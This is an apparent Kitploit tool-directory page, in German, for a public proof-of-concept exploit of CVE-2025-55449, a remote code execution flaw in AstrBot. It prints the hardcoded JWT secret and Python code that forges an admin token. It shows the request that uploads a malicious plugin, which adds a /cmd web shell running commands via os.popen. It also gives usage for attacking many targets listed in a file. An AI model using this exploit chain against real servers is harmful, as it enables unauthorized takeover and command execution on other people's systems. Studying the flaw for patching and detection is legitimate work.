Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/xhh1h/cve-2025-55449
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationAuthentifizierungPayload-Entwicklung
GitHubxhh1h/cve-2025-55449

CVE-2025-55449

CVE-2025-55449 EXP

Repository anzeigen
35vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-55449 - AstrBot Remote Code Execution (RCE)-Schwachstelle

Übersicht

Dieses Repository enthält einen Proof-of-Concept-Exploit für CVE-2025-55449, eine kritische Remote Code Execution (RCE)-Schwachstelle in AstrBot. Die Schwachstelle ermöglicht es einem Angreifer, beliebigen Code auf dem Zielsystem auszuführen, indem er die schwache JWT-Authentifizierung und den Plugin-Installationsmechanismus ausnutzt.

Beschreibung der Schwachstelle

Die Schwachstelle beruht auf Folgendem:

  1. Hartcodierter JWT-Geheimschlüssel: AstrBot verwendet für die Authentifizierung einen hartcodierten JWT-Geheimschlüssel (Advanced_System_for_Text_Response_and_Bot_Operations_Tool), sodass Angreifer gültige Authentifizierungstoken fälschen können.

  2. Uneingeschränkte Plugin-Installation: Der Endpunkt /api/plugin/install-upload erlaubt authentifizierten Benutzern, Plugins ohne ordnungsgemäße Validierung hochzuladen und zu installieren, wodurch beliebiger Python-Code ausgeführt werden kann.

  3. Codeausführung über das Plugin-System: Das Plugin-System erlaubt es Plugins, das Routing der Anwendung zu ändern und über die Flask/Quart-Anwendungsinstanz beliebige Befehle auszuführen.

Technische Details

Angriffsvektor

Tool herunterladen
  1. JWT-Token-Fälschung: Der Exploit erstellt mithilfe des hartcodierten geheimen Schlüssels ein JWT-Token mit Administratorrechten.

  2. Codeausführungsschwachstelle: Die Remote Code Execution-Schwachstelle im Backend nutzt die integrierte Plugin-Erweiterungsfunktion der Anwendung aus, die es Benutzern ermöglicht, benutzerdefinierte Plugin-Pakete hochzuladen. Das Programm entpackt die Pakete, liest die Plugin-Informationen, importiert die Python-Datei des Objekts und führt den Code aus.

Exploit-Ablauf

root@kitploit:~
1. Forge JWT token with hardcoded secret
2. Create malicious plugin ZIP file
3. POST to /api/plugin/install-upload with forged token
4. Plugin installs and adds /cmd endpoint
5. Execute commands via /cmd?cmd=<command>

Anforderungen

  • Python 3.6+
  • Erforderliche Python-Pakete:
    • jwt (PyJWT)
    • requests
    • zipfile (integriert)
    • argparse (integriert)
    • datetime (integriert)
    • pathlib (integriert)

Installation

  1. Klonen Sie dieses Repository:
root@kitploit:~
git clone <repository-url>
cd CVE-2025-55449
  1. Installieren Sie die erforderlichen Abhängigkeiten:
root@kitploit:~
pip install PyJWT requests

Verwendung

Einzelnes Ziel

Führen Sie den Exploit gegen eine einzelne Ziel-URL aus:

root@kitploit:~
python main.py http://target-ip:port

Mehrere Ziele

Erstellen Sie eine Datei (ip.txt) mit einer URL pro Zeile:

root@kitploit:~
http://target1:6185
http://target2:6185
http://target3:6185

Dann führen Sie aus:

root@kitploit:~
python main.py -r ip.txt

Beispielausgabe

Bei erfolgreicher Ausnutzung gibt das Skript Folgendes aus:

root@kitploit:~
http://target-ip:port/cmd?cmd=id

Sie können dann Befehle ausführen, indem Sie auf Folgendes zugreifen:

root@kitploit:~
http://target-ip:port/cmd?cmd=<your-command>

Zum Beispiel:

root@kitploit:~
http://target-ip:port/cmd?cmd=whoami
http://target-ip:port/cmd?cmd=ls -la

Projektstruktur

root@kitploit:~
CVE-2025-55449/
├── main.py                 # Main exploit script
├── ip.txt                  # Example target URLs file
├── README.md              # This file
└── helloworld/            # Malicious plugin directory
    ├── main.py            # Plugin code that adds /cmd endpoint
    ├── metadata.yaml      # Plugin metadata
    ├── LICENSE            # Plugin license
    └── README.md          # Plugin readme

Funktionsweise

JWT-Token-Fälschung

Der Exploit verwendet das hartcodierte JWT-Geheimnis, um ein gültiges Authentifizierungstoken zu erstellen:

root@kitploit:~
key = "Advanced_System_for_Text_Response_and_Bot_Operations_Tool"
payload = {"username": "admin", "exp": datetime.datetime.utcnow() + datetime.timedelta(days=7)}
forged = jwt.encode(payload, key, algorithm="HS256")

Bösartiges Plugin

Das Plugin (helloworld/main.py) nutzt Pythons Import-System und die Flask/Quart-Anwendungsinstanz aus, um eine neue Route zu injizieren:

root@kitploit:~
# The plugin finds the Quart application instance and adds a /cmd route
# that executes arbitrary commands via os.popen()

Plugin-Upload

Der Exploit verpackt das Plugin als ZIP-Datei und lädt es über den authentifizierten Endpunkt hoch:

root@kitploit:~
requests.post(
    url + "/api/plugin/install-upload",
    headers={"Authorization": "Bearer " + forged},
    files={"file": (name + ".zip", zip_payload_bytes)}
)